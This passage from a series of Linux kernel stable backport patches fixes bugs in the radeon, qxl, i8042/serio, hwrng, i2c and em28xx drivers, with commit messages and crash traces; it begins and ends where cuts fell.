+ if (!drm_core_check_feature(dev, DRIVER_MODESET)) + return -EINVAL; + if (page_flip->flags & ~DRM_MODE_PAGE_FLIP_FLAGS || page_flip->reserved != 0) return -EINVAL; From e5b91efc39672ab8c42fe70cdd9cc41f2d274ec5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michel=20D=C3=A4nzer?= Date: Tue, 29 Nov 2016 18:40:20 +0900 Subject: [PATCH 184/315] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit NOTE: This patch only applies to 4.5.y or older kernels. With newer kernels, this problem cannot happen because the driver now uses drm_crtc_vblank_on/off instead of drm_vblank_pre/post_modeset[0]. I consider this patch safer for older kernels than backporting the API change, because drm_crtc_vblank_on/off had various issues in older kernels, and I'm not sure all fixes for those have been backported to all stable branches where this patch could be applied. --------------------- Fixes the vblank interrupt being disabled when it should be on, which can cause at least the following symptoms: * Hangs when running 'xset dpms force off' in a GNOME session with gnome-shell using DRI2. * RandR 1.4 slave outputs freezing with garbage displayed using xf86-video-ati 7.8.0 or newer. [0] See upstream commit: commit 777e3cbc791f131806d9bf24b3325637c7fc228d Author: Daniel Vetter Date: Thu Jan 21 11:08:57 2016 +0100 drm/radeon: Switch to drm_vblank_on/off Reported-and-Tested-by: Max Staudt Reviewed-by: Daniel Vetter Reviewed-by: Alex Deucher Signed-off-by: Michel Dänzer Signed-off-by: Willy Tarreau --- drivers/gpu/drm/radeon/atombios_crtc.c | 2 ++ drivers/gpu/drm/radeon/radeon_legacy_crtc.c | 2 ++ 2 files changed, 4 insertions(+) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index 8ac33309499..4d09582744e 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -257,6 +257,8 @@ void atombios_crtc_dpms(struct drm_crtc *crtc, int mode) atombios_enable_crtc_memreq(crtc, ATOM_ENABLE); atombios_blank_crtc(crtc, ATOM_DISABLE); drm_vblank_post_modeset(dev, radeon_crtc->crtc_id); + /* Make sure vblank interrupt is still enabled if needed */ + radeon_irq_set(rdev); radeon_crtc_load_lut(crtc); break; case DRM_MODE_DPMS_STANDBY: diff --git a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c index bc73021d359..ae0d7b1cb9a 100644 --- a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c +++ b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c @@ -331,6 +331,8 @@ static void radeon_crtc_dpms(struct drm_crtc *crtc, int mode) WREG32_P(RADEON_CRTC_EXT_CNTL, crtc_ext_cntl, ~(mask | crtc_ext_cntl)); } drm_vblank_post_modeset(dev, radeon_crtc->crtc_id); + /* Make sure vblank interrupt is still enabled if needed */ + radeon_irq_set(rdev); radeon_crtc_load_lut(crtc); break; case DRM_MODE_DPMS_STANDBY: From c23e6ab94a41ac66390ea78a89eceea78a1b5795 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Mon, 11 Jul 2016 11:46:33 +0300 Subject: [PATCH 185/315] qxl: check for kmap failures commit f4cceb2affcd1285d4ce498089e8a79f4cd2fa66 upstream. If kmap fails, it leads to memory corruption. Fixes: f64122c1f6ad ('drm: add new QXL driver. (v1.4)') Signed-off-by: Dan Carpenter Signed-off-by: Daniel Vetter Link: http://patchwork.freedesktop.org/patch/msgid/20160711084633.GA31411@mwanda Signed-off-by: Willy Tarreau --- drivers/gpu/drm/qxl/qxl_draw.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/gpu/drm/qxl/qxl_draw.c b/drivers/gpu/drm/qxl/qxl_draw.c index 3c8c3dbf937..ff320522f45 100644 --- a/drivers/gpu/drm/qxl/qxl_draw.c +++ b/drivers/gpu/drm/qxl/qxl_draw.c @@ -114,6 +114,8 @@ static int qxl_palette_create_1bit(struct qxl_bo **palette_bo, palette_bo); ret = qxl_bo_kmap(*palette_bo, (void **)&pal); + if (ret) + return ret; pal->num_ents = 2; pal->unique = unique++; if (visual == FB_VISUAL_TRUECOLOR || visual == FB_VISUAL_DIRECTCOLOR) { From 6a0f3597d6bec9c7c4daf738f0be21d7b9616a95 Mon Sep 17 00:00:00 2001 From: Dmitry Torokhov Date: Mon, 25 Jul 2016 11:36:54 -0700 Subject: [PATCH 186/315] Input: i8042 - break load dependency between atkbd/psmouse and i8042 commit 4097461897df91041382ff6fcd2bfa7ee6b2448c upstream. As explained in 1407814240-4275-1-git-send-email-decui@microsoft.com we have a hard load dependency between i8042 and atkbd which prevents keyboard from working on Gen2 Hyper-V VMs. > hyperv_keyboard invokes serio_interrupt(), which needs a valid serio > driver like atkbd.c. atkbd.c depends on libps2.c because it invokes > ps2_command(). libps2.c depends on i8042.c because it invokes > i8042_check_port_owner(). As a result, hyperv_keyboard actually > depends on i8042.c. > > For a Generation 2 Hyper-V VM (meaning no i8042 device emulated), if a > Linux VM (like Arch Linux) happens to configure CONFIG_SERIO_I8042=m > rather than =y, atkbd.ko can't load because i8042.ko can't load(due to > no i8042 device emulated) and finally hyperv_keyboard can't work and > the user can't input: https://bugs.archlinux.org/task/39820 > (Ubuntu/RHEL/SUSE aren't affected since they use CONFIG_SERIO_I8042=y) To break the dependency we move away from using i8042_check_port_owner() and instead allow serio port owner specify a mutex that clients should use to serialize PS/2 command stream. Reported-by: Mark Laws Tested-by: Mark Laws Signed-off-by: Dmitry Torokhov Signed-off-by: Willy Tarreau --- drivers/input/serio/i8042.c | 16 +--------------- drivers/input/serio/libps2.c | 10 ++++------ include/linux/i8042.h | 6 ------ include/linux/serio.h | 24 +++++++++++++++++++----- 4 files changed, 24 insertions(+), 32 deletions(-) diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c index 9870c540e6f..2513c8a241c 100644 --- a/drivers/input/serio/i8042.c +++ b/drivers/input/serio/i8042.c @@ -1223,6 +1223,7 @@ static int __init i8042_create_kbd_port(void) serio->start = i8042_start; serio->stop = i8042_stop; serio->close = i8042_port_close; + serio->ps2_cmd_mutex = &i8042_mutex; serio->port_data = port; serio->dev.parent = &i8042_platform_device->dev; strlcpy(serio->name, "i8042 KBD port", sizeof(serio->name)); @@ -1310,21 +1311,6 @@ static void i8042_unregister_ports(void) } } -/* - * Checks whether port belongs to i8042 controller. - */ -bool i8042_check_port_owner(const struct serio *port) -{ - int i; - - for (i = 0; i < I8042_NUM_PORTS; i++) - if (i8042_ports[i].serio == port) - return true; - - return false; -} -EXPORT_SYMBOL(i8042_check_port_owner); - static void i8042_free_irqs(void) { if (i8042_aux_irq_registered) diff --git a/drivers/input/serio/libps2.c b/drivers/input/serio/libps2.c index 07a8363f3c5..b5ec313cb9c 100644 --- a/drivers/input/serio/libps2.c +++ b/drivers/input/serio/libps2.c @@ -57,19 +57,17 @@ EXPORT_SYMBOL(ps2_sendbyte); void ps2_begin_command(struct ps2dev *ps2dev) { - mutex_lock(&ps2dev->cmd_mutex); + struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex; - if (i8042_check_port_owner(ps2dev->serio)) - i8042_lock_chip(); + mutex_lock(m); } EXPORT_SYMBOL(ps2_begin_command); void ps2_end_command(struct ps2dev *ps2dev) { - if (i8042_check_port_owner(ps2dev->serio)) - i8042_unlock_chip(); + struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex; - mutex_unlock(&ps2dev->cmd_mutex); + mutex_unlock(m); } EXPORT_SYMBOL(ps2_end_command); diff --git a/include/linux/i8042.h b/include/linux/i8042.h index a986ff58894..801c307f6fc 100644 --- a/include/linux/i8042.h +++ b/include/linux/i8042.h @@ -38,7 +38,6 @@ struct serio; void i8042_lock_chip(void); void i8042_unlock_chip(void); int i8042_command(unsigned char *param, int command); -bool i8042_check_port_owner(const struct serio *); int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str, struct serio *serio)); int i8042_remove_filter(bool (*filter)(unsigned char data, unsigned char str, @@ -59,11 +58,6 @@ static inline int i8042_command(unsigned char *param, int command) return -ENODEV; } -static inline bool i8042_check_port_owner(const struct serio *serio) -{ - return false; -} - static inline int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str, struct serio *serio)) { diff --git a/include/linux/serio.h b/include/linux/serio.h index 36aac733840..deffa4746e1 100644 --- a/include/linux/serio.h +++ b/include/linux/serio.h @@ -28,7 +28,8 @@ struct serio { struct serio_device_id id; - spinlock_t lock; /* protects critical sections from port's interrupt handler */ + /* Protects critical sections from port's interrupt handler */ + spinlock_t lock; int (*write)(struct serio *, unsigned char); int (*open)(struct serio *); @@ -37,16 +38,29 @@ struct serio { void (*stop)(struct serio *); struct serio *parent; - struct list_head child_node; /* Entry in parent->children list */ + /* Entry in parent->children list */ + struct list_head child_node; struct list_head children; - unsigned int depth; /* level of nesting in serio hierarchy */ + /* Level of nesting in serio hierarchy */ + unsigned int depth; - struct serio_driver *drv; /* accessed from interrupt, must be protected by serio->lock and serio->sem */ - struct mutex drv_mutex; /* protects serio->drv so attributes can pin driver */ + /* + * serio->drv is accessed from interrupt handlers; when modifying + * caller should acquire serio->drv_mutex and serio->lock. + */ + struct serio_driver *drv; + /* Protects serio->drv so attributes can pin current driver */ + struct mutex drv_mutex; struct device dev; struct list_head node; + + /* + * For use by PS/2 layer when several ports share hardware and + * may get indigestion when exposed to concurrent access (i8042). + */ + struct mutex *ps2_cmd_mutex; }; #define to_serio_port(d) container_of(d, struct serio, dev) From 76494f748ade12160ab42552e582a656a942997d Mon Sep 17 00:00:00 2001 From: Dmitry Torokhov Date: Tue, 16 Aug 2016 17:38:54 -0700 Subject: [PATCH 187/315] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports commit 47af45d684b5f3ae000ad448db02ce4f13f73273 upstream. The commit 4097461897df ("Input: i8042 - break load dependency ...") correctly set up ps2_cmd_mutex pointer for the KBD port but forgot to do the same for AUX port(s), which results in communication on KBD and AUX ports to clash with each other. Fixes: 4097461897df ("Input: i8042 - break load dependency ...") Reported-by: Bruno Wolff III Tested-by: Bruno Wolff III Signed-off-by: Dmitry Torokhov Signed-off-by: Willy Tarreau --- drivers/input/serio/i8042.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c index 2513c8a241c..2d8f9593fb1 100644 --- a/drivers/input/serio/i8042.c +++ b/drivers/input/serio/i8042.c @@ -1249,6 +1249,7 @@ static int __init i8042_create_aux_port(int idx) serio->write = i8042_aux_write; serio->start = i8042_start; serio->stop = i8042_stop; + serio->ps2_cmd_mutex = &i8042_mutex; serio->port_data = port; serio->dev.parent = &i8042_platform_device->dev; if (idx < 0) { From cee7df22578d423b4748b6ba0e8f15246f1a6000 Mon Sep 17 00:00:00 2001 From: Dmitry Torokhov Date: Tue, 2 Aug 2016 10:31:43 -0700 Subject: [PATCH 188/315] Input: ili210x - fix permissions on "calibrate" attribute commit b27c0d0c3bf3073e8ae19875eb1d3755c5e8c072 upstream. "calibrate" attribute does not provide "show" methods and thus we should not mark it as readable. Signed-off-by: Dmitry Torokhov Signed-off-by: Willy Tarreau --- drivers/input/touchscreen/ili210x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c index 1418bdda61b..ceaa790b71a 100644 --- a/drivers/input/touchscreen/ili210x.c +++ b/drivers/input/touchscreen/ili210x.c @@ -169,7 +169,7 @@ static ssize_t ili210x_calibrate(struct device *dev, return count; } -static DEVICE_ATTR(calibrate, 0644, NULL, ili210x_calibrate); +static DEVICE_ATTR(calibrate, S_IWUSR, NULL, ili210x_calibrate); static struct attribute *ili210x_attributes[] = { &dev_attr_calibrate.attr, From 08cd2b50f3101c9e16839d84c6791bd416a3a70d Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Mon, 14 Mar 2016 09:07:14 +0900 Subject: [PATCH 189/315] hwrng: exynos - Disable runtime PM on probe failure commit 48a61e1e2af8020f11a2b8f8dc878144477623c6 upstream. Add proper error path (for disabling runtime PM) when registering of hwrng fails. Fixes: b329669ea0b5 ("hwrng: exynos - Add support for Exynos random number generator") Signed-off-by: Krzysztof Kozlowski Signed-off-by: Herbert Xu Signed-off-by: Willy Tarreau --- drivers/char/hw_random/exynos-rng.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/char/hw_random/exynos-rng.c b/drivers/char/hw_random/exynos-rng.c index 402ccfb625c..b6ec73f320d 100644 --- a/drivers/char/hw_random/exynos-rng.c +++ b/drivers/char/hw_random/exynos-rng.c @@ -105,6 +105,7 @@ static int exynos_rng_probe(struct platform_device *pdev) { struct exynos_rng *exynos_rng; struct resource *res; + int ret; exynos_rng = devm_kzalloc(&pdev->dev, sizeof(struct exynos_rng), GFP_KERNEL); @@ -132,7 +133,13 @@ static int exynos_rng_probe(struct platform_device *pdev) pm_runtime_use_autosuspend(&pdev->dev); pm_runtime_enable(&pdev->dev); - return hwrng_register(&exynos_rng->rng); + ret = hwrng_register(&exynos_rng->rng); + if (ret) { + pm_runtime_dont_use_autosuspend(&pdev->dev); + pm_runtime_disable(&pdev->dev); + } + + return ret; } static int exynos_rng_remove(struct platform_device *pdev) From 1ef0fbffc8c39ef08c7353241f81226e7a42c481 Mon Sep 17 00:00:00 2001 From: Nishanth Menon Date: Fri, 24 Jun 2016 11:50:39 -0500 Subject: [PATCH 190/315] hwrng: omap - Fix assumption that runtime_get_sync will always succeed commit 61dc0a446e5d08f2de8a24b45f69a1e302bb1b1b upstream. pm_runtime_get_sync does return a error value that must be checked for error conditions, else, due to various reasons, the device maynot be enabled and the system will crash due to lack of clock to the hardware module. Before: 12.562784] [00000000] *pgd=fe193835 12.562792] Internal error: : 1406 [#1] SMP ARM [...] 12.562864] CPU: 1 PID: 241 Comm: modprobe Not tainted 4.7.0-rc4-next-20160624 #2 12.562867] Hardware name: Generic DRA74X (Flattened Device Tree) 12.562872] task: ed51f140 ti: ed44c000 task.ti: ed44c000 12.562886] PC is at omap4_rng_init+0x20/0x84 [omap_rng] 12.562899] LR is at set_current_rng+0xc0/0x154 [rng_core] [...] After the proper checks: [ 94.366705] omap_rng 48090000.rng: _od_fail_runtime_resume: FIXME: missing hwmod/omap_dev info [ 94.375767] omap_rng 48090000.rng: Failed to runtime_get device -19 [ 94.382351] omap_rng 48090000.rng: initialization failed. Fixes: 665d92fa85b5 ("hwrng: OMAP: convert to use runtime PM") Cc: Paul Walmsley Signed-off-by: Nishanth Menon Signed-off-by: Herbert Xu [wt: adjusted context for pre-3.12-rc1 kernels] Signed-off-by: Willy Tarreau --- drivers/char/hw_random/omap-rng.c | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c index d2903e77227..52aebbe7326 100644 --- a/drivers/char/hw_random/omap-rng.c +++ b/drivers/char/hw_random/omap-rng.c @@ -127,7 +127,12 @@ static int omap_rng_probe(struct platform_device *pdev) dev_set_drvdata(&pdev->dev, priv); pm_runtime_enable(&pdev->dev); - pm_runtime_get_sync(&pdev->dev); + ret = pm_runtime_get_sync(&pdev->dev); + if (ret) { + dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret); + pm_runtime_put_noidle(&pdev->dev); + goto err_ioremap; + } ret = hwrng_register(&omap_rng_ops); if (ret) @@ -182,8 +187,15 @@ static int omap_rng_suspend(struct device *dev) static int omap_rng_resume(struct device *dev) { struct omap_rng_private_data *priv = dev_get_drvdata(dev); + int ret; + + ret = pm_runtime_get_sync(dev); + if (ret) { + dev_err(dev, "Failed to runtime_get device: %d\n", ret); + pm_runtime_put_noidle(dev); + return ret; + } - pm_runtime_get_sync(dev); omap_rng_write_reg(priv, RNG_MASK_REG, 0x1); return 0; From 8e9a1e986a52f262d224cb3b08f7ea08f5ad3252 Mon Sep 17 00:00:00 2001 From: Dave Gerlach Date: Tue, 20 Sep 2016 10:25:40 -0500 Subject: [PATCH 191/315] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 commit ad8529fde9e3601180a839867a8ab041109aebb5 upstream. Currently omap-rng checks the return value of pm_runtime_get_sync and reports failure if anything is returned, however it should be checking if ret < 0 as pm_runtime_get_sync return 0 on success but also can return 1 if the device was already active which is not a failure case. Only values < 0 are actual failures. Fixes: 61dc0a446e5d ("hwrng: omap - Fix assumption that runtime_get_sync will always succeed") Signed-off-by: Dave Gerlach Signed-off-by: Herbert Xu Signed-off-by: Willy Tarreau --- drivers/char/hw_random/omap-rng.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c index 52aebbe7326..2798fb1f91e 100644 --- a/drivers/char/hw_random/omap-rng.c +++ b/drivers/char/hw_random/omap-rng.c @@ -128,7 +128,7 @@ static int omap_rng_probe(struct platform_device *pdev) pm_runtime_enable(&pdev->dev); ret = pm_runtime_get_sync(&pdev->dev); - if (ret) { + if (ret < 0) { dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret); pm_runtime_put_noidle(&pdev->dev); goto err_ioremap; @@ -190,7 +190,7 @@ static int omap_rng_resume(struct device *dev) int ret; ret = pm_runtime_get_sync(dev); - if (ret) { + if (ret < 0) { dev_err(dev, "Failed to runtime_get device: %d\n", ret); pm_runtime_put_noidle(dev); return ret; From 24e4e0023a75da713b06c8de0ee1849534a54bd9 Mon Sep 17 00:00:00 2001 From: "Yadi.hu" Date: Sun, 18 Sep 2016 18:52:31 +0800 Subject: [PATCH 192/315] i2c-eg20t: fix race between i2c init and interrupt enable commit 371a015344b6e270e7e3632107d9554ec6d27a6b upstream. the eg20t driver call request_irq() function before the pch_base_address, base address of i2c controller's register, is assigned an effective value. there is one possible scenario that an interrupt which isn't inside eg20t arrives immediately after request_irq() is executed when i2c controller shares an interrupt number with others. since the interrupt handler pch_i2c_handler() has already active as shared action, it will be called and read its own register to determine if this interrupt is from itself. At that moment, since base address of i2c registers is not remapped in kernel space yet,so the INT handler will access an illegal address and then a error occurs. Signed-off-by: Yadi.hu Signed-off-by: Wolfram Sang Signed-off-by: Willy Tarreau --- drivers/i2c/busses/i2c-eg20t.c | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/drivers/i2c/busses/i2c-eg20t.c b/drivers/i2c/busses/i2c-eg20t.c index 0f3752967c4..773a6f5a509 100644 --- a/drivers/i2c/busses/i2c-eg20t.c +++ b/drivers/i2c/busses/i2c-eg20t.c @@ -798,13 +798,6 @@ static int pch_i2c_probe(struct pci_dev *pdev, /* Set the number of I2C channel instance */ adap_info->ch_num = id->driver_data; - ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED, - KBUILD_MODNAME, adap_info); - if (ret) { - pch_pci_err(pdev, "request_irq FAILED\n"); - goto err_request_irq; - } - for (i = 0; i < adap_info->ch_num; i++) { pch_adap = &adap_info->pch_data[i].pch_adapter; adap_info->pch_i2c_suspended = false; @@ -821,6 +814,17 @@ static int pch_i2c_probe(struct pci_dev *pdev, adap_info->pch_data[i].pch_base_address = base_addr + 0x100 * i; pch_adap->dev.parent = &pdev->dev; + } + + ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED, + KBUILD_MODNAME, adap_info); + if (ret) { + pch_pci_err(pdev, "request_irq FAILED\n"); + goto err_request_irq; + } + + for (i = 0; i < adap_info->ch_num; i++) { + pch_adap = &adap_info->pch_data[i].pch_adapter; pch_i2c_init(&adap_info->pch_data[i]); From c05b6f0adec9156d284c369002f9d7b0f053aa1e Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Mon, 9 May 2016 05:22:55 -0300 Subject: [PATCH 193/315] em28xx-i2c: rt_mutex_trylock() returns zero on failure commit e44c153b30c9a0580fc2b5a93f3c6d593def2278 upstream. The code is checking for negative returns but it should be checking for zero. Fixes: aab3125c43d8 ('[media] em28xx: add support for registering multiple i2c buses') Signed-off-by: Dan Carpenter Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Willy Tarreau --- drivers/media/usb/em28xx/em28xx-i2c.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/media/usb/em28xx/em28xx-i2c.c b/drivers/media/usb/em28xx/em28xx-i2c.c index c4ff9739a7a..d28d9068396 100644 --- a/drivers/media/usb/em28xx/em28xx-i2c.c +++ b/drivers/media/usb/em28xx/em28xx-i2c.c @@ -469,9 +469,8 @@ static int em28xx_i2c_xfer(struct i2c_adapter *i2c_adap, int addr, rc, i; u8 reg; - rc = rt_mutex_trylock(&dev->i2c_bus_lock); - if (rc < 0) - return rc; + if (!rt_mutex_trylock(&dev->i2c_bus_lock)) + return -EAGAIN; /* Switch I2C bus if needed */ if (bus != dev->cur_i2c_bus && From 3c5054e9776992ee9cac82c0b4b85f241e953851 Mon Sep 17 00:00:00 2001 From: Vladimir Zapolskiy Date: Mon, 31 Oct 2016 21:46:24 +0200 Subject: [PATCH 194/315] i2c: core: fix NULL pointer dereference under race condition commit 147b36d5b70c083cc76770c47d60b347e8eaf231 upstream. Race condition between registering an I2C device driver and deregistering an I2C adapter device which is assumed to manage that I2C device may lead to a NULL pointer dereference due to the uninitialized list head of driver clients. The root cause of the issue is that the I2C bus may know about the registered device driver and thus it is matched by bus_for_each_drv(), but the list of clients is not initialized and commonly it is NULL, because I2C device drivers define struct i2c_driver as static and clients field is expected to be initialized by I2C core: i2c_register_driver() i2c_del_adapter() driver_register() ... bus_add_driver() ... ... bus_for_each_drv(..., __process_removed_adapter) ... i2c_do_del_adapter() ... list_for_each_entry_safe(..., &driver->clients, ...) INIT_LIST_HEAD(&driver->clients); To solve the problem it is sufficient to do clients list head initialization before calling driver_register(). The problem was found while using an I2C device driver with a sluggish registration routine on a bus provided by a physically detachable I2C master controller, but practically the oops may be reproduced under the race between arbitraty I2C device driver registration and managing I2C bus device removal e.g. by unbinding the latter over sysfs: % echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind Unable to handle kernel NULL pointer dereference at virtual address 00000000 Internal error: Oops: 17 [#1] SMP ARM CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61 Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree) task: e5ada400 task.stack: e4936000 PC is at i2c_do_del_adapter+0x20/0xcc LR is at __process_removed_adapter+0x14/0x1c Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none Control: 10c5387d Table: 35bd004a DAC: 00000051 Process sh (pid: 533, stack limit = 0xe4936210) Stack: (0xe4937d28 to 0xe4938000) Backtrace: [] (i2c_do_del_adapter) from [] (__process_removed_adapter+0x14/0x1c) [] (__process_removed_adapter) from [] (bus_for_each_drv+0x6c/0xa0) [] (bus_for_each_drv) from [] (i2c_del_adapter+0xbc/0x284) [] (i2c_del_adapter) from [] (i2c_imx_remove+0x44/0x164 [i2c_imx]) [] (i2c_imx_remove [i2c_imx]) from [] (platform_drv_remove+0x2c/0x44) [] (platform_drv_remove) from [] (__device_release_driver+0x90/0x12c) [] (__device_release_driver) from [] (device_release_driver+0x28/0x34) [] (device_release_driver) from [] (unbind_store+0x80/0x104) [] (unbind_store) from [] (drv_attr_store+0x28/0x34) [] (drv_attr_store) from [] (sysfs_kf_write+0x50/0x54) [] (sysfs_kf_write) from [] (kernfs_fop_write+0x100/0x214) [] (kernfs_fop_write) from [] (__vfs_write+0x34/0x120) [] (__vfs_write) from [] (vfs_write+0xa8/0x170) [] (vfs_write) from [] (SyS_write+0x4c/0xa8) [] (SyS_write) from [] (ret_fast_syscall+0x0/0x1c) Signed-off-by: Vladimir Zapolskiy Signed-off-by: Wolfram Sang Signed-off-by: Willy Tarreau --- drivers/i2c/i2c-core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/i2c/i2c-core.c b/drivers/i2c/i2c-core.c index 9d539cbfc83..c0e4143bee9 100644 --- a/drivers/i2c/i2c-core.c +++ b/drivers/i2c/i2c-core.c @@ -1323,6 +1323,7 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver) /* add the driver to the list of i2c drivers in the driver core */ driver->driver.owner = owner; driver->driver.bus = &i2c_bus_type; + INIT_LIST_HEAD(&driver->clients); /* When registration returns, the driver core * will have called probe() for all matching-but-unbound devices. @@ -1341,7 +1342,6 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver) pr_debug("i2c-core: driver [%s] registered\n", driver->driver.name); - INIT_LIST_HEAD(&driver->clients); /* Walk the adapters that are already present */ i2c_for_each_dev(driver, __process_new_driver); From 53f6ff2f88690a5dbf50c108e52f14679982d137 Mon Sep 17 00:00:00 2001 From: Cyrille Pitchen Date: Wed, 21 Oct 2015 15:44:03 +0200 Subject: [PATCH 195/315] i2c: at91: fix write transfers by clearing pending interrupt first commit 6f6ddbb09d2a5baded0e23add3ad2d9e9417ab30 upstream. In some cases a NACK interrupt may be pending in the Status Register (SR) as a result of a previous transfer. However at91_do_twi_transfer() did not read the SR to clear pending interruptions before starting a new transfer. Hence a NACK interrupt rose as soon as it was enabled again at the I2C controller level, resulting in a wrong sequence of operations and strange patterns of behaviour on the I2C bus, such as a clock stretch followed by a restart of the transfer. This first issue occurred with both DMA and PIO write transfers. Also when a NACK error was detected during a PIO write transfer, the interrupt handler used to wrongly start a new transfer by writing into the Transmit Holding Register (THR). Then the I2C slave was likely to reply with a second NACK. This second issue is fixed in atmel_twi_interrupt() by handling the TXRDY status bit only if both the TXCOMP and NACK status bits are cleared. Tested with a at24 eeprom on sama5d36ek board running a linux-4.1-at91 kernel image. Adapted to linux-next. Reported-by: Peter Rosin Signed-off-by: Cyrille Pitchen Signed-off-by: Ludovic Desroches Tested-by: Peter Rosin Signed-off-by: Wolfram Sang Fixes: 93563a6a71bb ("i2c: at91: fix a race condition when using the DMA controller") Signed-off-by: Willy Tarreau --- drivers/i2c/busses/i2c-at91.c | 58 ++++++++++++++++++++++++++++++----- 1 file changed, 50 insertions(+), 8 deletions(-) diff --git a/drivers/i2c/busses/i2c-at91.c b/drivers/i2c/busses/i2c-at91.c index ceabcfeb587..c880d13f540 100644 --- a/drivers/i2c/busses/i2c-at91.c +++ b/drivers/i2c/busses/i2c-at91.c @@ -371,19 +371,57 @@ static irqreturn_t atmel_twi_interrupt(int irq, void *dev_id) if (!irqstatus) return IRQ_NONE; - else if (irqstatus & AT91_TWI_RXRDY) - at91_twi_read_next_byte(dev); - else if (irqstatus & AT91_TWI_TXRDY) - at91_twi_write_next_byte(dev); - - /* catch error flags */ - dev->transfer_status |= status; + /* + * When a NACK condition is detected, the I2C controller sets the NACK, + * TXCOMP and TXRDY bits all together in the Status Register (SR). + * + * 1 - Handling NACK errors with CPU write transfer. + * + * In such case, we should not write the next byte into the Transmit + * Holding Register (THR) otherwise the I2C controller would start a new + * transfer and the I2C slave is likely to reply by another NACK. + * + * 2 - Handling NACK errors with DMA write transfer. + * + * By setting the TXRDY bit in the SR, the I2C controller also triggers + * the DMA controller to write the next data into the THR. Then the + * result depends on the hardware version of the I2C controller. + * + * 2a - Without support of the Alternative Command mode. + * + * This is the worst case: the DMA controller is triggered to write the + * next data into the THR, hence starting a new transfer: the I2C slave + * is likely to reply by another NACK. + * Concurrently, this interrupt handler is likely to be called to manage + * the first NACK before the I2C controller detects the second NACK and + * sets once again the NACK bit into the SR. + * When handling the first NACK, this interrupt handler disables the I2C + * controller interruptions, especially the NACK interrupt. + * Hence, the NACK bit is pending into the SR. This is why we should + * read the SR to clear all pending interrupts at the beginning of + * at91_do_twi_transfer() before actually starting a new transfer. + * + * 2b - With support of the Alternative Command mode. + * + * When a NACK condition is detected, the I2C controller also locks the + * THR (and sets the LOCK bit in the SR): even though the DMA controller + * is triggered by the TXRDY bit to write the next data into the THR, + * this data actually won't go on the I2C bus hence a second NACK is not + * generated. + */ if (irqstatus & (AT91_TWI_TXCOMP | AT91_TWI_NACK)) { at91_disable_twi_interrupts(dev); complete(&dev->cmd_complete); + } else if (irqstatus & AT91_TWI_RXRDY) { + at91_twi_read_next_byte(dev); + } else if (irqstatus & AT91_TWI_TXRDY) { + at91_twi_write_next_byte(dev); } + /* catch error flags */ + dev->transfer_status |= status; + return IRQ_HANDLED; } @@ -391,6 +429,7 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev) { int ret; bool has_unre_flag = dev->pdata->has_unre_flag; + unsigned sr; /* * WARNING: the TXCOMP bit in the Status Register is NOT a clear on @@ -426,13 +465,16 @@ static int at91_do_twi_transfer(struct at91_twi_dev *dev) INIT_COMPLETION(dev->cmd_complete); dev->transfer_status = 0; + /* Clear pending interrupts, such as NACK. */ + sr = at91_twi_read(dev, AT91_TWI_SR); + if (!dev->buf_len) { at91_twi_write(dev, AT91_TWI_CR, AT91_TWI_QUICK); at91_twi_write(dev, AT91_TWI_IER, AT91_TWI_TXCOMP); } else if (dev->msg->flags & I2C_M_RD) { unsigned start_flags = AT91_TWI_START; - if (at91_twi_read(dev, AT91_TWI_SR) & AT91_TWI_RXRDY) { + if (sr & AT91_TWI_RXRDY) { dev_err(dev->dev, "RXRDY still set!"); at91_twi_read(dev, AT91_TWI_RHR); } From 0f9dcb7bb15e9df1c307ed386a1769381d80017f Mon Sep 17 00:00:00 2001 From: Linus Walleij Date: Tue, 16 Aug 2016 15:33:28 +0200 Subject: [PATCH 196/315] iio: accel: kxsd9: Fix raw read return commit 